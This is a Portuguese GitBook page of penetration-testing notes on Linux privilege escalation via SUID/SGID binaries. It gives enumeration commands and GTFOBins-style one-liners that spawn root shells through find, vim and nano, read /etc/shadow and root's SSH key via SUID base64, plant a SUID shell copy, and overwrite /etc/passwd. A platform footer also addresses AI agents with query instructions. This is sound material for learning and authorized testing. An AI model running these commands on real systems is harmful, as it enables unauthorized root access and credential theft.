> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/privesc/suid.md).

# SUID

Binaries SUID executam com os privilégios de seu proprietário, geralmente root. Um binário SUID vulnerável, desatualizado ou excessivamente flexível pode ler arquivos protegidos, abrir uma shell privilegiada ou executar código controlado pelo invasor.

## Metodologia

* Enumere os binários SUID e compare entradas incomuns com o GTFOBins.
* Priorize binários personalizados, versões antigas, dependências graváveis e binários localizados fora dos caminhos padrão do sistema.
* Teste as primitivas de leitura, gravação, execução de comandos e carregamento de bibliotecas antes de executar payloads destrutivos.

## Verificações rápidas

```bash
find / -perm -4000 -type f 2>/dev/null
find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -2000 -ls 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
```

## Triagem de SUID e SGID

SUID executa o binário com os privilégios do proprietário do arquivo, enquanto SGID o executa com os privilégios do grupo do arquivo. Após a enumeração, compare binários incomuns com [GTFOBins](https://gtfobins.github.io/) e priorize caminhos personalizados, diretórios graváveis e binários pertencentes ao root.

Verificações rápidas úteis:

```bash
find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -2000 -ls 2>/dev/null
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -la {} \; 2>/dev/null
```

Exemplos comuns no estilo GTFOBins:

```bash
find . -exec /bin/sh -p \; -quit
```

Para `nano`, use `Ctrl+R`, depois `Ctrl+X`, então execute:

```
reset; sh 1>&0 2>&0
```

Para `vim`:

```bash
vim -c ':shell'
vim -c ':!/bin/sh'
```

Se um fluxo de trabalho de cópia SUID/privilegiada puder sobrescrever arquivos sensíveis, valide cuidadosamente a primitiva de gravação antes de tocar em arquivos de produção:

```bash
cp /tmp/malicious_passwd /etc/passwd
```

Se `base64` é SUID, use-o como uma primitiva de leitura em vez de uma primitiva de shell:

```bash
ls -la /usr/bin/base64
/usr/bin/base64 /etc/shadow | base64 --decode
/usr/bin/base64 /root/.ssh/id_rsa | base64 --decode
/usr/bin/base64 /var/log/auth.log | base64 --decode
```

Se `cp` é SUID, valide se ele pode criar ou preservar uma cópia privilegiada:

```bash
cp /bin/sh /tmp/sh
chmod +s /tmp/sh
/tmp/sh -p
```

Binários SUID/SGID comuns que valem a pena revisar:

| Binário                                               | Por que verificar                                                        |
| ----------------------------------------------------- | ------------------------------------------------------------------------ |
| `sudo` / `su`                                         | Ferramentas diretas de limite de privilégios.                            |
| `passwd`, `chsh`, `newgrp`, `gpasswd`                 | Utilitários de modificação de contas e grupos.                           |
| `at`                                                  | Execução agendada de comandos.                                           |
| `mount`, `umount`                                     | Acesso ao sistema de arquivos e opções de montagem.                      |
| `pkexec`                                              | Auxiliar do Polkit, historicamente afetado pelo PwnKit.                  |
| `base64`                                              | Leia arquivos protegidos e decodifique localmente.                       |
| `cp`                                                  | Copie ou sobrescreva arquivos quando as permissões permitirem.           |
| `find`, `nano`, `vim`, `less`, `more`, `bash`, `dash` | Primitivas de shell, leitura ou gravação de arquivos no estilo GTFOBins. |
| `nmap`                                                | Modo interativo legado ou caminhos de execução de scripts.               |

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID pkexec / PwnKit</h4></td><td>Notas sobre SUID (Pkexec) para escalada de privilégios no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatórios.</td><td><a href="/pages/85cbaf05baff9be2d702140ce3fa48679281e1fc">/pages/85cbaf05baff9be2d702140ce3fa48679281e1fc</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Base64</h4></td><td>Notas sobre SUID (Base64) para escalada de privilégios no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatórios.</td><td><a href="/pages/66bde5dc8ddd7b6953f04d9f8dd8a024c45ecfca">/pages/66bde5dc8ddd7b6953f04d9f8dd8a024c45ecfca</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID PHP</h4></td><td>Notas sobre SUID (PHP) para escalada de privilégios no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatórios.</td><td><a href="/pages/f20c1e6e0e4b8d3f06e68305ef06c4b688ec32fe">/pages/f20c1e6e0e4b8d3f06e68305ef06c4b688ec32fe</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Despejo de Memória /opt/count</h4></td><td>Notas sobre SUID - Despejo de Memória (/opt/count) para escalada de privilégios no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatórios.</td><td><a href="/pages/3ac2f38c77b94a3b97cb3df5b73945576d418d29">/pages/3ac2f38c77b94a3b97cb3df5b73945576d418d29</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>Arquivo Ausente SUID</h4></td><td>Notas sobre Binário SUID (Arquivo Ausente) para escalada de privilégios no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatórios.</td><td><a href="/pages/f04135b7193f561c3b791e0af9466806af7c4aa8">/pages/f04135b7193f561c3b791e0af9466806af7c4aa8</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID screen</h4></td><td>Notas sobre SUID (screen) para escalada de privilégios no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatórios.</td><td><a href="/pages/b73a292c283c0e1966a0254828fedec641f5c4cd">/pages/b73a292c283c0e1966a0254828fedec641f5c4cd</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Nmap</h4></td><td>Notas sobre SUID (Nmap) para escalada de privilégios no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatórios.</td><td><a href="/pages/32b9efc156aa068268ef68bc095b80a76d0ce6e4">/pages/32b9efc156aa068268ef68bc095b80a76d0ce6e4</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>Binário de Backup SUID</h4></td><td>Notas sobre Binário SUID (Backup) para escalada de privilégios no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatórios.</td><td><a href="/pages/58acbc749d07657c5a44d5a4de491fca6983f29b">/pages/58acbc749d07657c5a44d5a4de491fca6983f29b</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Enlightenment</h4></td><td>Notas sobre SUID (Enlightenment) para escalada de privilégios no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatórios.</td><td><a href="/pages/ff844473021148e678e6cb7cd0204130fbe1bd92">/pages/ff844473021148e678e6cb7cd0204130fbe1bd92</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/privesc/suid.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
